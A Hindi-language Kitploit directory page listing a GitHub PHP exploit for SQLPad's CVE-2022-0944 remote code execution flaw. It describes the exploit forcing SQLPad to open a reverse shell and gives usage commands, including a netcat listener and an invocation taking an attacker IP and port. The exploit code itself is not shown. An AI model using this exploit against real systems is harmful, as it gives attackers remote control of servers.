Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 दूरस्थ कोड निष्पादन शोषण | Kitploit
उपकरण/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 दूरस्थ कोड निष्पादन शोषण

रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

यह कैसे काम करता है:

यह PHP कोड SQLPad में CVE-2022-0944 से संबंधित एक रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी का शोषण करने के लिए डिज़ाइन किया गया है।
यह SQLPad एप्लिकेशन में दुर्भावनापूर्ण कोड इंजेक्ट करके काम करता है, और इसे एक सिस्टम कमांड निष्पादित करने के लिए मजबूर करता है जो एक रिवर्स शेल खोलता है – एक कनेक्शन जो हमलावर को कमजोर सिस्टम का दूरस्थ नियंत्रण प्रदान करता है।


पूर्वापेक्षाएँ:

  • PHP CLI – sudo apt-get install php-cli
  • cURL (PHP cURL लाइब्रेरी) – sudo apt-get install php-curl

उपयोग:

1. लिसनर सेट अप करें (हमलावर मशीन पर)

रिवर्स शेल कनेक्शन कैप्चर करने के लिए, हमलावर की मशीन पर Netcat प्रारंभ करें:

root@kitploit:~
nc -lvnp 4444

एक्सप्लॉइट चलाएँ

root@kitploit:~
php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: कमजोर SQLPad का मूल URL (जैसे, http://target.com:3000)

<attacker_ip>: रिवर्स कनेक्शन सुनने वाला हमलावर का IP पता (Netcat IP के समान)

<attacker_port>: जिस पोर्ट पर हमलावर सुन रहा है (Netcat पोर्ट के समान)

संदर्भ

मूल एक्सप्लॉइट तर्क इस रिपॉजिटरी पर आधारित था:

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

यहाँ मेरा लक्ष्य एक्सप्लॉइट तर्क को समझना और इसे एक व्यक्तिगत चुनौती के रूप में दूसरी प्रोग्रामिंग भाषा में फिर से लिखना था।

अतिरिक्त संदर्भ: 🔗 CVE-2022-0944 – NVD

टूल डाउनलोड करें